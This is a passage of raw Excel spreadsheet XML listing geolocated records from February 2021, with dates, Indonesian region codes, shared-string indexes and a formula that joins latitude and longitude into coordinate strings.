        <v>21411</v>
      </c>
      <c r="Y3586" t="str">
        <f t="shared" si="55"/>
        <v>-2.58680,140.50338</v>
      </c>
    </row>
    <row r="3587" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3587">
        <v>282172</v>
      </c>
      <c r="B3587" s="1">
        <v>44250</v>
      </c>
      <c r="C3587" s="2">
        <v>0.32774305555555555</v>
      </c>
      <c r="D3587" t="s">
        <v>22</v>
      </c>
      <c r="E3587" t="s">
        <v>23</v>
      </c>
      <c r="F3587" t="s">
        <v>11844</v>
      </c>
      <c r="H3587" t="s">
        <v>7086</v>
      </c>
      <c r="I3587" t="s">
        <v>11845</v>
      </c>
      <c r="J3587" t="s">
        <v>1656</v>
      </c>
      <c r="L3587" t="s">
        <v>11846</v>
      </c>
      <c r="M3587">
        <v>3173080003</v>
      </c>
      <c r="N3587">
        <v>3173080</v>
      </c>
      <c r="O3587">
        <v>3173</v>
      </c>
      <c r="P3587">
        <v>31</v>
      </c>
      <c r="Q3587" t="s">
        <v>157</v>
      </c>
      <c r="R3587" t="s">
        <v>157</v>
      </c>
      <c r="S3587" t="s">
        <v>62</v>
      </c>
      <c r="T3587" t="s">
        <v>33</v>
      </c>
      <c r="U3587" s="5">
        <v>10682917</v>
      </c>
      <c r="V3587" s="5" t="s">
        <v>17680</v>
      </c>
      <c r="W3587" s="5">
        <v>-618198</v>
      </c>
      <c r="X3587" t="s">
        <v>21412</v>
      </c>
      <c r="Y3587" t="str">
        <f t="shared" ref="Y3587:Y3650" si="56">CONCATENATE(X3587,",",V3587)</f>
        <v>-6.18198,106.82917</v>
      </c>
    </row>
    <row r="3588" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3588">
        <v>282173</v>
      </c>
      <c r="B3588" s="1">
        <v>44250</v>
      </c>
      <c r="C3588" s="2">
        <v>0.29942129629629627</v>
      </c>
      <c r="D3588" t="s">
        <v>85</v>
      </c>
      <c r="E3588" t="s">
        <v>23</v>
      </c>
      <c r="F3588" t="s">
        <v>11847</v>
      </c>
      <c r="G3588" t="s">
        <v>11848</v>
      </c>
      <c r="H3588" t="s">
        <v>26</v>
      </c>
      <c r="J3588" t="s">
        <v>2627</v>
      </c>
      <c r="K3588" t="s">
        <v>11849</v>
      </c>
      <c r="L3588" t="s">
        <v>11850</v>
      </c>
      <c r="M3588">
        <v>3216050002</v>
      </c>
      <c r="N3588">
        <v>3216050</v>
      </c>
      <c r="O3588">
        <v>3216</v>
      </c>
      <c r="P3588">
        <v>32</v>
      </c>
      <c r="Q3588" t="s">
        <v>6642</v>
      </c>
      <c r="R3588" t="s">
        <v>11851</v>
      </c>
      <c r="S3588" t="s">
        <v>41</v>
      </c>
      <c r="T3588" t="s">
        <v>42</v>
      </c>
      <c r="U3588" s="5">
        <v>10725585</v>
      </c>
      <c r="V3588" s="5" t="s">
        <v>17681</v>
      </c>
      <c r="W3588" s="5">
        <v>-626937</v>
      </c>
      <c r="X3588" t="s">
        <v>21413</v>
      </c>
      <c r="Y3588" t="str">
        <f t="shared" si="56"/>
        <v>-6.26937,107.25585</v>
      </c>
    </row>
    <row r="3589" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3589">
        <v>282176</v>
      </c>
      <c r="B3589" s="1">
        <v>44250</v>
      </c>
      <c r="C3589" s="2">
        <v>0.33144675925925926</v>
      </c>
      <c r="D3589" t="s">
        <v>22</v>
      </c>
      <c r="E3589" t="s">
        <v>23</v>
      </c>
      <c r="F3589" t="s">
        <v>11852</v>
      </c>
      <c r="H3589" t="s">
        <v>7978</v>
      </c>
      <c r="I3589" t="s">
        <v>7979</v>
      </c>
      <c r="J3589" t="s">
        <v>1656</v>
      </c>
      <c r="L3589" t="s">
        <v>11853</v>
      </c>
      <c r="M3589">
        <v>3173080003</v>
      </c>
      <c r="N3589">
        <v>3173080</v>
      </c>
      <c r="O3589">
        <v>3173</v>
      </c>
      <c r="P3589">
        <v>31</v>
      </c>
      <c r="Q3589" t="s">
        <v>157</v>
      </c>
      <c r="R3589" t="s">
        <v>157</v>
      </c>
      <c r="S3589" t="s">
        <v>62</v>
      </c>
      <c r="T3589" t="s">
        <v>33</v>
      </c>
      <c r="U3589" s="5">
        <v>10682685</v>
      </c>
      <c r="V3589" s="5" t="s">
        <v>17682</v>
      </c>
      <c r="W3589" s="5">
        <v>-617448</v>
      </c>
      <c r="X3589" t="s">
        <v>21414</v>
      </c>
      <c r="Y3589" t="str">
        <f t="shared" si="56"/>
        <v>-6.17448,106.82685</v>
      </c>
    </row>
    <row r="3590" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3590">
        <v>282182</v>
      </c>
      <c r="B3590" s="1">
        <v>44250</v>
      </c>
      <c r="C3590" s="2">
        <v>0.33277777777777778</v>
      </c>
      <c r="D3590" t="s">
        <v>85</v>
      </c>
      <c r="E3590" t="s">
        <v>23</v>
      </c>
      <c r="F3590" t="s">
        <v>11854</v>
      </c>
      <c r="G3590" t="s">
        <v>11855</v>
      </c>
      <c r="H3590" t="s">
        <v>26</v>
      </c>
      <c r="J3590" t="s">
        <v>2627</v>
      </c>
      <c r="K3590" t="s">
        <v>11856</v>
      </c>
      <c r="L3590" t="s">
        <v>11857</v>
      </c>
      <c r="M3590">
        <v>3216050002</v>
      </c>
      <c r="N3590">
        <v>3216050</v>
      </c>
      <c r="O3590">
        <v>3216</v>
      </c>
      <c r="P3590">
        <v>32</v>
      </c>
      <c r="Q3590" t="s">
        <v>6642</v>
      </c>
      <c r="R3590" t="s">
        <v>11851</v>
      </c>
      <c r="S3590" t="s">
        <v>41</v>
      </c>
      <c r="T3590" t="s">
        <v>42</v>
      </c>
      <c r="U3590" s="5">
        <v>10725656</v>
      </c>
      <c r="V3590" s="5" t="s">
        <v>17683</v>
      </c>
      <c r="W3590" s="5">
        <v>-626933</v>
      </c>
      <c r="X3590" t="s">
        <v>21415</v>
      </c>
      <c r="Y3590" t="str">
        <f t="shared" si="56"/>
        <v>-6.26933,107.25656</v>
      </c>
    </row>
    <row r="3591" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3591">
        <v>282183</v>
      </c>
      <c r="B3591" s="1">
        <v>44250</v>
      </c>
      <c r="C3591" s="2">
        <v>0.33362268518518517</v>
      </c>
      <c r="D3591" t="s">
        <v>85</v>
      </c>
      <c r="E3591" t="s">
        <v>23</v>
      </c>
      <c r="F3591" t="s">
        <v>11858</v>
      </c>
      <c r="G3591" t="s">
        <v>11859</v>
      </c>
      <c r="H3591" t="s">
        <v>26</v>
      </c>
      <c r="I3591" t="s">
        <v>103</v>
      </c>
      <c r="J3591" t="s">
        <v>2627</v>
      </c>
      <c r="K3591" t="s">
        <v>11860</v>
      </c>
      <c r="L3591" t="s">
        <v>11861</v>
      </c>
      <c r="M3591">
        <v>3216050002</v>
      </c>
      <c r="N3591">
        <v>3216050</v>
      </c>
      <c r="O3591">
        <v>3216</v>
      </c>
      <c r="P3591">
        <v>32</v>
      </c>
      <c r="Q3591" t="s">
        <v>6642</v>
      </c>
      <c r="R3591" t="s">
        <v>11851</v>
      </c>
      <c r="S3591" t="s">
        <v>41</v>
      </c>
      <c r="T3591" t="s">
        <v>42</v>
      </c>
      <c r="U3591" s="5">
        <v>10725656</v>
      </c>
      <c r="V3591" s="5" t="s">
        <v>17683</v>
      </c>
      <c r="W3591" s="5">
        <v>-626933</v>
      </c>
      <c r="X3591" t="s">
        <v>21415</v>
      </c>
      <c r="Y3591" t="str">
        <f t="shared" si="56"/>
        <v>-6.26933,107.25656</v>
      </c>
    </row>
    <row r="3592" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3592">
        <v>282205</v>
      </c>
      <c r="B3592" s="1">
        <v>44250</v>
      </c>
      <c r="C3592" s="2">
        <v>0.40956018518518517</v>
      </c>
      <c r="D3592" t="s">
        <v>22</v>
      </c>
      <c r="E3592" t="s">
        <v>23</v>
      </c>
      <c r="F3592" t="s">
        <v>11862</v>
      </c>
      <c r="H3592" t="s">
        <v>26</v>
      </c>
      <c r="I3592" t="s">
        <v>137</v>
      </c>
      <c r="J3592" t="s">
        <v>11863</v>
      </c>
      <c r="L3592" t="s">
        <v>11864</v>
      </c>
      <c r="M3592">
        <v>3374050006</v>
      </c>
      <c r="N3592">
        <v>3374050</v>
      </c>
      <c r="O3592">
        <v>3374</v>
      </c>
      <c r="P3592">
        <v>33</v>
      </c>
      <c r="Q3592" t="s">
        <v>11865</v>
      </c>
      <c r="R3592" t="s">
        <v>11866</v>
      </c>
      <c r="S3592" t="s">
        <v>1334</v>
      </c>
      <c r="T3592" t="s">
        <v>1134</v>
      </c>
      <c r="U3592" s="5">
        <v>11042938</v>
      </c>
      <c r="V3592" s="5" t="s">
        <v>17684</v>
      </c>
      <c r="W3592" s="5">
        <v>-700029</v>
      </c>
      <c r="X3592" t="s">
        <v>21416</v>
      </c>
      <c r="Y3592" t="str">
        <f t="shared" si="56"/>
        <v>-7.00029,110.42938</v>
      </c>
    </row>
    <row r="3593" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3593">
        <v>282241</v>
      </c>
      <c r="B3593" s="1">
        <v>44250</v>
      </c>
      <c r="C3593" s="2">
        <v>0.5284375</v>
      </c>
      <c r="D3593" t="s">
        <v>22</v>
      </c>
      <c r="E3593" t="s">
        <v>23</v>
      </c>
      <c r="F3593" t="s">
        <v>11867</v>
      </c>
      <c r="G3593" t="s">
        <v>11868</v>
      </c>
      <c r="H3593" t="s">
        <v>26</v>
      </c>
      <c r="I3593" t="s">
        <v>1046</v>
      </c>
      <c r="J3593" t="s">
        <v>11869</v>
      </c>
      <c r="M3593">
        <v>3374130008</v>
      </c>
      <c r="N3593">
        <v>3374130</v>
      </c>
      <c r="O3593">
        <v>3374</v>
      </c>
      <c r="P3593">
        <v>33</v>
      </c>
      <c r="Q3593" t="s">
        <v>9721</v>
      </c>
      <c r="R3593" t="s">
        <v>9633</v>
      </c>
      <c r="S3593" t="s">
        <v>1334</v>
      </c>
      <c r="T3593" t="s">
        <v>1134</v>
      </c>
      <c r="U3593" s="5">
        <v>11043109</v>
      </c>
      <c r="V3593" s="5" t="s">
        <v>17685</v>
      </c>
      <c r="W3593" s="5">
        <v>-696804</v>
      </c>
      <c r="X3593" t="s">
        <v>21417</v>
      </c>
      <c r="Y3593" t="str">
        <f t="shared" si="56"/>
        <v>-6.96804,110.43109</v>
      </c>
    </row>
    <row r="3594" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3594">
        <v>282264</v>
      </c>
      <c r="B3594" s="1">
        <v>44250</v>
      </c>
      <c r="C3594" s="2">
        <v>0.60187500000000005</v>
      </c>
      <c r="D3594" t="s">
        <v>22</v>
      </c>
      <c r="E3594" t="s">
        <v>23</v>
      </c>
      <c r="F3594" t="s">
        <v>11870</v>
      </c>
      <c r="G3594" t="s">
        <v>11871</v>
      </c>
      <c r="H3594" t="s">
        <v>26</v>
      </c>
      <c r="I3594" t="s">
        <v>974</v>
      </c>
      <c r="J3594" t="s">
        <v>11872</v>
      </c>
      <c r="L3594" t="s">
        <v>11873</v>
      </c>
      <c r="M3594">
        <v>3374110009</v>
      </c>
      <c r="N3594">
        <v>3374110</v>
      </c>
      <c r="O3594">
        <v>3374</v>
      </c>
      <c r="P3594">
        <v>33</v>
      </c>
      <c r="Q3594" t="s">
        <v>11874</v>
      </c>
      <c r="R3594" t="s">
        <v>9625</v>
      </c>
      <c r="S3594" t="s">
        <v>1334</v>
      </c>
      <c r="T3594" t="s">
        <v>1134</v>
      </c>
      <c r="U3594" s="5">
        <v>11043449</v>
      </c>
      <c r="V3594" s="5" t="s">
        <v>17686</v>
      </c>
      <c r="W3594" s="5">
        <v>-696486</v>
      </c>
      <c r="X3594" t="s">
        <v>21418</v>
      </c>
      <c r="Y3594" t="str">
        <f t="shared" si="56"/>
        <v>-6.96486,110.43449</v>
      </c>
    </row>
    <row r="3595" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3595">
        <v>282272</v>
      </c>
      <c r="B3595" s="1">
        <v>44250</v>
      </c>
      <c r="C3595" s="2">
        <v>0.74138888888888888</v>
      </c>
      <c r="D3595" t="s">
        <v>22</v>
      </c>
      <c r="E3595" t="s">
        <v>23</v>
      </c>
      <c r="F3595" t="s">
        <v>11875</v>
      </c>
      <c r="G3595" t="s">
        <v>11876</v>
      </c>
      <c r="H3595" t="s">
        <v>26</v>
      </c>
      <c r="I3595" t="s">
        <v>27</v>
      </c>
      <c r="J3595" t="s">
        <v>11877</v>
      </c>
      <c r="L3595" t="s">
        <v>11878</v>
      </c>
      <c r="M3595">
        <v>3374100004</v>
      </c>
      <c r="N3595">
        <v>3374100</v>
      </c>
      <c r="O3595">
        <v>3374</v>
      </c>
      <c r="P3595">
        <v>33</v>
      </c>
      <c r="Q3595" t="s">
        <v>9855</v>
      </c>
      <c r="R3595" t="s">
        <v>9608</v>
      </c>
      <c r="S3595" t="s">
        <v>1334</v>
      </c>
      <c r="T3595" t="s">
        <v>1134</v>
      </c>
      <c r="U3595" s="5">
        <v>11044564</v>
      </c>
      <c r="V3595" s="5" t="s">
        <v>17687</v>
      </c>
      <c r="W3595" s="5">
        <v>-698866</v>
      </c>
      <c r="X3595" t="s">
        <v>21419</v>
      </c>
      <c r="Y3595" t="str">
        <f t="shared" si="56"/>
        <v>-6.98866,110.44564</v>
      </c>
    </row>
    <row r="3596" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3596">
        <v>282273</v>
      </c>
      <c r="B3596" s="1">
        <v>44250</v>
      </c>
      <c r="C3596" s="2">
        <v>0.9927893518518518</v>
      </c>
      <c r="D3596" t="s">
        <v>22</v>
      </c>
      <c r="E3596" t="s">
        <v>23</v>
      </c>
      <c r="F3596" t="s">
        <v>11879</v>
      </c>
      <c r="H3596" t="s">
        <v>26</v>
      </c>
      <c r="I3596" t="s">
        <v>27</v>
      </c>
      <c r="J3596" t="s">
        <v>9711</v>
      </c>
      <c r="L3596" t="s">
        <v>11880</v>
      </c>
      <c r="M3596">
        <v>3374080012</v>
      </c>
      <c r="N3596">
        <v>3374080</v>
      </c>
      <c r="O3596">
        <v>3374</v>
      </c>
      <c r="P3596">
        <v>33</v>
      </c>
      <c r="Q3596" t="s">
        <v>2991</v>
      </c>
      <c r="R3596" t="s">
        <v>2992</v>
      </c>
      <c r="S3596" t="s">
        <v>1334</v>
      </c>
      <c r="T3596" t="s">
        <v>1134</v>
      </c>
      <c r="U3596" s="5">
        <v>11045333</v>
      </c>
      <c r="V3596" s="5" t="s">
        <v>17688</v>
      </c>
      <c r="W3596" s="5">
        <v>-696732</v>
      </c>
      <c r="X3596" t="s">
        <v>21420</v>
      </c>
      <c r="Y3596" t="str">
        <f t="shared" si="56"/>
        <v>-6.96732,110.45333</v>
      </c>
    </row>
    <row r="3597" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3597">
        <v>282274</v>
      </c>
      <c r="B3597" s="1">
        <v>44251</v>
      </c>
      <c r="C3597" s="2">
        <v>0.11253472222222222</v>
      </c>
      <c r="D3597" t="s">
        <v>22</v>
      </c>
      <c r="E3597" t="s">
        <v>23</v>
      </c>
      <c r="F3597" t="s">
        <v>11881</v>
      </c>
      <c r="G3597" t="s">
        <v>11882</v>
      </c>
      <c r="H3597" t="s">
        <v>26</v>
      </c>
      <c r="I3597" t="s">
        <v>72</v>
      </c>
      <c r="J3597" t="s">
        <v>11883</v>
      </c>
      <c r="L3597" t="s">
        <v>11884</v>
      </c>
      <c r="M3597">
        <v>3374100003</v>
      </c>
      <c r="N3597">
        <v>3374100</v>
      </c>
      <c r="O3597">
        <v>3374</v>
      </c>
      <c r="P3597">
        <v>33</v>
      </c>
      <c r="Q3597" t="s">
        <v>11885</v>
      </c>
      <c r="R3597" t="s">
        <v>9608</v>
      </c>
      <c r="S3597" t="s">
        <v>1334</v>
      </c>
      <c r="T3597" t="s">
        <v>1134</v>
      </c>
      <c r="U3597" s="5">
        <v>11044914</v>
      </c>
      <c r="V3597" s="5" t="s">
        <v>17689</v>
      </c>
      <c r="W3597" s="5">
        <v>-698204</v>
      </c>
      <c r="X3597" t="s">
        <v>21421</v>
      </c>
      <c r="Y3597" t="str">
        <f t="shared" si="56"/>
        <v>-6.98204,110.44914</v>
      </c>
    </row>
    <row r="3598" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3598">
        <v>282275</v>
      </c>
      <c r="B3598" s="1">
        <v>44251</v>
      </c>
      <c r="C3598" s="2">
        <v>0.14723379629629629</v>
      </c>
      <c r="D3598" t="s">
        <v>85</v>
      </c>
      <c r="E3598" t="s">
        <v>23</v>
      </c>
      <c r="F3598" t="s">
        <v>11886</v>
      </c>
      <c r="G3598" t="s">
        <v>11887</v>
      </c>
      <c r="H3598" t="s">
        <v>26</v>
      </c>
      <c r="J3598" t="s">
        <v>2627</v>
      </c>
      <c r="K3598" t="s">
        <v>11888</v>
      </c>
      <c r="L3598" t="s">
        <v>11889</v>
      </c>
      <c r="M3598">
        <v>3275020003</v>
      </c>
      <c r="N3598">
        <v>3275020</v>
      </c>
      <c r="O3598">
        <v>3275</v>
      </c>
      <c r="P3598">
        <v>32</v>
      </c>
      <c r="Q3598" t="s">
        <v>4738</v>
      </c>
      <c r="R3598" t="s">
        <v>828</v>
      </c>
      <c r="S3598" t="s">
        <v>41</v>
      </c>
      <c r="T3598" t="s">
        <v>42</v>
      </c>
      <c r="U3598" s="5">
        <v>10697070</v>
      </c>
      <c r="V3598" s="5" t="s">
        <v>17690</v>
      </c>
      <c r="W3598" s="5">
        <v>-629836</v>
      </c>
      <c r="X3598" t="s">
        <v>21422</v>
      </c>
      <c r="Y3598" t="str">
        <f t="shared" si="56"/>
        <v>-6.29836,106.97070</v>
      </c>
    </row>
    <row r="3599" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3599">
        <v>282277</v>
      </c>
      <c r="B3599" s="1">
        <v>44251</v>
      </c>
      <c r="C3599" s="2">
        <v>0.34252314814814816</v>
      </c>
      <c r="D3599" t="s">
        <v>22</v>
      </c>
      <c r="E3599" t="s">
        <v>23</v>
      </c>
      <c r="F3599" t="s">
        <v>11890</v>
      </c>
      <c r="H3599" t="s">
        <v>26</v>
      </c>
      <c r="I3599" t="s">
        <v>7646</v>
      </c>
      <c r="J3599" t="s">
        <v>2627</v>
      </c>
      <c r="L3599" t="s">
        <v>11891</v>
      </c>
      <c r="M3599">
        <v>3215113005</v>
      </c>
      <c r="N3599">
        <v>3215113</v>
      </c>
      <c r="O3599">
        <v>3215</v>
      </c>
      <c r="P3599">
        <v>32</v>
      </c>
      <c r="Q3599" t="s">
        <v>9968</v>
      </c>
      <c r="R3599" t="s">
        <v>9969</v>
      </c>
      <c r="S3599" t="s">
        <v>3979</v>
      </c>
      <c r="T3599" t="s">
        <v>42</v>
      </c>
      <c r="U3599" s="5">
        <v>10727541</v>
      </c>
      <c r="V3599" s="5" t="s">
        <v>17691</v>
      </c>
      <c r="W3599" s="5">
        <v>-627813</v>
      </c>
      <c r="X3599" t="s">
        <v>21423</v>
      </c>
      <c r="Y3599" t="str">
        <f t="shared" si="56"/>
        <v>-6.27813,107.27541</v>
      </c>
    </row>
    <row r="3600" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3600">
        <v>282278</v>
      </c>
      <c r="B3600" s="1">
        <v>44251</v>
      </c>
      <c r="C3600" s="2">
        <v>0.58045138888888892</v>
      </c>
      <c r="D3600" t="s">
        <v>22</v>
      </c>
      <c r="E3600" t="s">
        <v>23</v>
      </c>
      <c r="F3600" t="s">
        <v>11892</v>
      </c>
      <c r="H3600" t="s">
        <v>26</v>
      </c>
      <c r="I3600" t="s">
        <v>137</v>
      </c>
      <c r="J3600" t="s">
        <v>11893</v>
      </c>
      <c r="L3600" t="s">
        <v>11894</v>
      </c>
      <c r="M3600">
        <v>3374090011</v>
      </c>
      <c r="N3600">
        <v>3374090</v>
      </c>
      <c r="O3600">
        <v>3374</v>
      </c>
      <c r="P3600">
        <v>33</v>
      </c>
      <c r="Q3600" t="s">
        <v>1426</v>
      </c>
      <c r="R3600" t="s">
        <v>1362</v>
      </c>
      <c r="S3600" t="s">
        <v>1334</v>
      </c>
      <c r="T3600" t="s">
        <v>1134</v>
      </c>
      <c r="U3600" s="5">
        <v>11047915</v>
      </c>
      <c r="V3600" s="5" t="s">
        <v>17692</v>
      </c>
      <c r="W3600" s="5">
        <v>-695195</v>
      </c>
      <c r="X3600" t="s">
        <v>21424</v>
      </c>
      <c r="Y3600" t="str">
        <f t="shared" si="56"/>
        <v>-6.95195,110.47915</v>
      </c>
    </row>
    <row r="3601" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3601">
        <v>282279</v>
      </c>
      <c r="B3601" s="1">
        <v>44251</v>
      </c>
      <c r="C3601" s="2">
        <v>0.82734953703703706</v>
      </c>
      <c r="D3601" t="s">
        <v>22</v>
      </c>
      <c r="E3601" t="s">
        <v>23</v>
      </c>
      <c r="F3601" t="s">
        <v>11895</v>
      </c>
      <c r="G3601" t="s">
        <v>11896</v>
      </c>
      <c r="H3601" t="s">
        <v>26</v>
      </c>
      <c r="I3601" t="s">
        <v>131</v>
      </c>
      <c r="J3601" t="s">
        <v>2608</v>
      </c>
      <c r="L3601" t="s">
        <v>11897</v>
      </c>
      <c r="M3601">
        <v>3318210012</v>
      </c>
      <c r="N3601">
        <v>3318210</v>
      </c>
      <c r="O3601">
        <v>3318</v>
      </c>
      <c r="P3601">
        <v>33</v>
      </c>
      <c r="Q3601" t="s">
        <v>11898</v>
      </c>
      <c r="R3601" t="s">
        <v>11899</v>
      </c>
      <c r="S3601" t="s">
        <v>2986</v>
      </c>
      <c r="T3601" t="s">
        <v>1134</v>
      </c>
      <c r="U3601" s="5">
        <v>11097208</v>
      </c>
      <c r="V3601" s="5" t="s">
        <v>17693</v>
      </c>
      <c r="W3601" s="5">
        <v>-645060</v>
      </c>
      <c r="X3601" t="s">
        <v>21425</v>
      </c>
      <c r="Y3601" t="str">
        <f t="shared" si="56"/>
        <v>-6.45060,110.97208</v>
      </c>
    </row>
    <row r="3602" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3602">
        <v>282394</v>
      </c>
      <c r="B3602" s="1">
        <v>44252</v>
      </c>
      <c r="C3602" s="2">
        <v>0.7241319444444444</v>
      </c>
      <c r="D3602" t="s">
        <v>22</v>
      </c>
      <c r="E3602" t="s">
        <v>23</v>
      </c>
      <c r="F3602" t="s">
        <v>11900</v>
      </c>
      <c r="H3602" t="s">
        <v>7978</v>
      </c>
      <c r="I3602" t="s">
        <v>11901</v>
      </c>
      <c r="J3602" t="s">
        <v>5171</v>
      </c>
      <c r="L3602" t="s">
        <v>11902</v>
      </c>
      <c r="M3602">
        <v>3175010004</v>
      </c>
      <c r="N3602">
        <v>3175010</v>
      </c>
      <c r="O3602">
        <v>3175</v>
      </c>
      <c r="P3602">
        <v>31</v>
      </c>
      <c r="Q3602" t="s">
        <v>546</v>
      </c>
      <c r="R3602" t="s">
        <v>546</v>
      </c>
      <c r="S3602" t="s">
        <v>547</v>
      </c>
      <c r="T3602" t="s">
        <v>33</v>
      </c>
      <c r="U3602" s="5">
        <v>10680713</v>
      </c>
      <c r="V3602" s="5" t="s">
        <v>16263</v>
      </c>
      <c r="W3602" s="5">
        <v>-612105</v>
      </c>
      <c r="X3602" t="s">
        <v>21426</v>
      </c>
      <c r="Y3602" t="str">
        <f t="shared" si="56"/>
        <v>-6.12105,106.80713</v>
      </c>
    </row>
    <row r="3603" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3603">
        <v>282396</v>
      </c>
      <c r="B3603" s="1">
        <v>44253</v>
      </c>
      <c r="C3603" s="2">
        <v>0.21875</v>
      </c>
      <c r="D3603" t="s">
        <v>2648</v>
      </c>
      <c r="E3603" t="s">
        <v>23</v>
      </c>
      <c r="G3603" t="s">
        <v>11903</v>
      </c>
      <c r="H3603" t="s">
        <v>26</v>
      </c>
      <c r="J3603" t="s">
        <v>5747</v>
      </c>
      <c r="L3603" t="s">
        <v>11904</v>
      </c>
      <c r="M3603">
        <v>3172050002</v>
      </c>
      <c r="N3603">
        <v>3172050</v>
      </c>
      <c r="O3603">
        <v>3172</v>
      </c>
      <c r="P3603">
        <v>31</v>
      </c>
      <c r="Q3603" t="s">
        <v>5749</v>
      </c>
      <c r="R3603" t="s">
        <v>358</v>
      </c>
      <c r="S3603" t="s">
        <v>49</v>
      </c>
      <c r="T3603" t="s">
        <v>33</v>
      </c>
      <c r="U3603" s="5">
        <v>10685748</v>
      </c>
      <c r="V3603" s="5" t="s">
        <v>17694</v>
      </c>
      <c r="W3603" s="5">
        <v>-628146</v>
      </c>
      <c r="X3603" t="s">
        <v>21427</v>
      </c>
      <c r="Y3603" t="str">
        <f t="shared" si="56"/>
        <v>-6.28146,106.85748</v>
      </c>
    </row>
    <row r="3604" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3604">
        <v>282412</v>
      </c>
      <c r="B3604" s="1">
        <v>44253</v>
      </c>
      <c r="C3604" s="2">
        <v>0.37480324074074073</v>
      </c>
      <c r="D3604" t="s">
        <v>22</v>
      </c>
      <c r="E3604" t="s">
        <v>23</v>
      </c>
      <c r="F3604" t="s">
        <v>11905</v>
      </c>
      <c r="H3604" t="s">
        <v>26</v>
      </c>
      <c r="I3604" t="s">
        <v>2005</v>
      </c>
      <c r="J3604" t="s">
        <v>2615</v>
      </c>
      <c r="L3604" t="s">
        <v>11906</v>
      </c>
      <c r="M3604">
        <v>3404070002</v>
      </c>
      <c r="N3604">
        <v>3404070</v>
      </c>
      <c r="O3604">
        <v>3404</v>
      </c>
      <c r="P3604">
        <v>34</v>
      </c>
      <c r="Q3604" t="s">
        <v>11907</v>
      </c>
      <c r="R3604" t="s">
        <v>185</v>
      </c>
      <c r="S3604" t="s">
        <v>1855</v>
      </c>
      <c r="T3604" t="s">
        <v>1856</v>
      </c>
      <c r="U3604" s="5">
        <v>11043147</v>
      </c>
      <c r="V3604" s="5" t="s">
        <v>17695</v>
      </c>
      <c r="W3604" s="5">
        <v>-776537</v>
      </c>
      <c r="X3604" t="s">
        <v>21428</v>
      </c>
      <c r="Y3604" t="str">
        <f t="shared" si="56"/>
        <v>-7.76537,110.43147</v>
      </c>
    </row>
    <row r="3605" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3605">
        <v>282413</v>
      </c>
      <c r="B3605" s="1">
        <v>44253</v>
      </c>
      <c r="C3605" s="2">
        <v>0.43827546296296299</v>
      </c>
      <c r="D3605" t="s">
        <v>85</v>
      </c>
      <c r="E3605" t="s">
        <v>23</v>
      </c>
      <c r="F3605" t="s">
        <v>11908</v>
      </c>
      <c r="G3605" t="s">
        <v>11909</v>
      </c>
      <c r="H3605" t="s">
        <v>26</v>
      </c>
      <c r="J3605" t="s">
        <v>2615</v>
      </c>
      <c r="K3605" t="s">
        <v>11910</v>
      </c>
      <c r="L3605" t="s">
        <v>11911</v>
      </c>
      <c r="M3605">
        <v>3404070001</v>
      </c>
      <c r="N3605">
        <v>3404070</v>
      </c>
      <c r="O3605">
        <v>3404</v>
      </c>
      <c r="P3605">
        <v>34</v>
      </c>
      <c r="Q3605" t="s">
        <v>7412</v>
      </c>
      <c r="R3605" t="s">
        <v>185</v>
      </c>
      <c r="S3605" t="s">
        <v>1855</v>
      </c>
      <c r="T3605" t="s">
        <v>1856</v>
      </c>
      <c r="U3605" s="5">
        <v>11039192</v>
      </c>
      <c r="V3605" s="5" t="s">
        <v>17696</v>
      </c>
      <c r="W3605" s="5">
        <v>-777656</v>
      </c>
      <c r="X3605" t="s">
        <v>21429</v>
      </c>
      <c r="Y3605" t="str">
        <f t="shared" si="56"/>
        <v>-7.77656,110.39192</v>
      </c>
    </row>
    <row r="3606" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3606">
        <v>282415</v>
      </c>
      <c r="B3606" s="1">
        <v>44253</v>
      </c>
      <c r="C3606" s="2">
        <v>0.48443287037037036</v>
      </c>
      <c r="D3606" t="s">
        <v>22</v>
      </c>
      <c r="E3606" t="s">
        <v>23</v>
      </c>
      <c r="F3606" t="s">
        <v>11912</v>
      </c>
      <c r="G3606" t="s">
        <v>11913</v>
      </c>
      <c r="H3606" t="s">
        <v>26</v>
      </c>
      <c r="I3606" t="s">
        <v>555</v>
      </c>
      <c r="J3606" t="s">
        <v>7171</v>
      </c>
      <c r="L3606" t="s">
        <v>11914</v>
      </c>
      <c r="M3606">
        <v>6472060005</v>
      </c>
      <c r="N3606">
        <v>6472060</v>
      </c>
      <c r="O3606">
        <v>6472</v>
      </c>
      <c r="P3606">
        <v>64</v>
      </c>
      <c r="Q3606" t="s">
        <v>8404</v>
      </c>
      <c r="R3606" t="s">
        <v>7203</v>
      </c>
      <c r="S3606" t="s">
        <v>7175</v>
      </c>
      <c r="T3606" t="s">
        <v>1308</v>
      </c>
      <c r="U3606" s="5">
        <v>11715126</v>
      </c>
      <c r="V3606" s="5" t="s">
        <v>17697</v>
      </c>
      <c r="W3606" s="5">
        <v>-44150</v>
      </c>
      <c r="X3606" t="s">
        <v>21430</v>
      </c>
      <c r="Y3606" t="str">
        <f t="shared" si="56"/>
        <v xml:space="preserve"> -0.44150,117.15126</v>
      </c>
    </row>
    <row r="3607" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3607">
        <v>282416</v>
      </c>
      <c r="B3607" s="1">
        <v>44254</v>
      </c>
      <c r="C3607" s="2">
        <v>8.4652777777777785E-2</v>
      </c>
      <c r="D3607" t="s">
        <v>22</v>
      </c>
      <c r="E3607" t="s">
        <v>23</v>
      </c>
      <c r="F3607" t="s">
        <v>11915</v>
      </c>
      <c r="H3607" t="s">
        <v>26</v>
      </c>
      <c r="I3607" t="s">
